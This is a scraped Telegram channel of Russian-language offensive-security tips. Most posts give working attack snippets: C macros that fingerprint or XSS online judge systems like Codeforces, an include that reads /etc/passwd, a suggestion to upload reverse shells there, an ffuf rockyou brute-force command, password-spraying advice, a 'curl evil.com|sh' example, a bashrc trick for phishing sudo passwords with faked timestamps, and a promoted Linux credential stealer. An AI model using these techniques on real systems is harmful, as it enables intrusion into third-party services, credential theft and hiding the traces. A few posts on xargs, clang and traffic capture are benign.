the sun
253 subscribers
32 photos
3 videos
3 files
24 links
Download Telegram
#offensive #compiler

Из систем для проверки кода (codeforces, итп) можно вытаскивать данные разными забавными способами

Таким макросом иногда можно получить ОС которую использует тестовая система:
cpp=
#ifdef _WIN32
#pragma message "Windows 32-bit"
#elif _WIN64
#pragma message "Windows 64-bit"
#elif APPLE || MACH
#pragma message "Mac OSX"
#elif linux
#pragma message "Linux"
#elif FreeBSD
#pragma message "FreeBSD"
#elif unix || unix__
#pragma message "Unix"
#else
#pragma message "Other"
#endif

int main() {}

Иногда с помощью макроса можно затриггерить XSS:
#pragma message "</pre><script>alert('xss')</script>"

int main() {}

А в некоторых случаях даже читать файлы инклудом:
#include "../../../../../../../../../etc/passwd"

int main() {}


И конечно никто не отменял возможность залить рев-шел (но лучше заливать сразу последовательность команд с выводом, так как таймлимит часто убивает программу до того как что-то успеешь сделать)
#offensive #burp #ffuf #web #bruteforce

Если использовать Burp Intruder для брутфорса (пиратку точно), то он может просто умирать при большом количестве запросов - вероятно кончается память для хранения ответов.

Один из вариантов - использовать ffuf для брутфорса.
Можно скопировать запрос из Developer Tools браузера в curl запрос -> заменить curl на ffuf -> добавить -u перед url и вордлист -> настроить фильтры на incorrect username -> наслаждаться многопоточным опенсорсным http брутфорсом который можно ставить на паузу

ffuf -w ./Wordlists/rockyou.txt -X POST -u https://somepage.com/login --data 'username=admin&password=FUZZ'
#offensive #web #python

Приложения на python, особенно использующие фласк часто подвержены race condition
#pipeline #linux
Иногда нужно вызвать какую-то команду для каждой строчки из файла. Например есть файл с кучей IP или доменов, а мы хотим запросить whois для каждого, можно воспользоваться xargs:

cat ips.txt | xargs -I '{}' sh -c 'whois {}'

Есть вариант покороче, но не всегда подходит:

cat ips.txt | xargs -n1 whois

- тут строчка из файла подставляется в конец, что не всегда подходит (ssh <строчка>@host или ffuf -u <хост>/?FUZZ=1 )
#offensive #note
Если получилось подобрать пароль к одному пользователю - стоит проверить такой же пароль для остальных пользователей (веерная брутфорс атака).

Иногда у пользователя больше одного аккаунта в системе - один может быть служебным, а другой - для работы с документами. Естественно, пароли для удобства ставят одинаковые
#codeanalysis
Удивительно, но парсеров для C (рабочих) почти нет.

Хорошо что у clang есть биндинги, и парсить ast можно даже через питон
Forwarded from vx-underground
Today VirusTotal announced that each sample uploaded will be accompanied by "Code Insight". Code Insight uses Sec-PaLM, one of the generative AI models by Google, to explain what the malicious binary is doing.

Code Insight is available to all users.

tl;dr "they took my job"
😢2
#chatgpt на удивление хорошо умеет создавать #frontend если дать правильный промпт
🔥21😁1
🛠 Встала, вроде бы, простая задачка - получить дамп трафика для конкретного приложения в Linux.

Для реализации нашлась утилита nsntrace, которое делает нужное за счёт выполнения приложения в отдельном сетевом неймспейсе. Набросал короткую заметку по этому поводу...

📗 https://sysadmin.pm/nsntrace/

#network #trace #pcap
👍1
Немного скринов к завтрашнему #attackdefense
👍6🥰1
Исходники сервиса с #attackdefense
🥰5
Forwarded from Aleksandr
maxwell.7z
2 MB
Первый удачный botrace вместе с @favelanky
Получили B-шку
👍5🎉1
Полезная штука для #privesc
Если получить шелл под пользователем но не знать пароль от пользователя (например просто внаглую подойти и сделать curl evil.com|sh, или через эксплойт), можно с её помощью попытаться зафишить пароль. Вообще, bashrc и подобные файлы редко регулярно проверяются, а таймштамп можно подменить через touch -a -m -t <timestamp> <file>
Получается защита от подобного сейчас одна - мониторинг логов/SIEM, что для рядового пользователя линукса не подходит. Как вот теперь спокойно запускать sudo, и не параноить по поводу bashrc?
😢1
Forwarded from Cybred
https://github.com/ph4ntonn/Impost3r/

Impost3r is a tool that aim to steal many kinds of linux passwords (including ssh, su, sudo) written by C. Attackers can use Impost3r to make a trap to steal the legal user's passwords.

When Impost3r steal the sudo password successfully, it will automatically clean the traces it make on the target server.
Находка дня https://weakpass.com/

Сайт с огромной базой словарей для брута, все разложено по полочкам, подписано что для чего, плюс автор сам выпускает свои подборки пользуйтесь🤘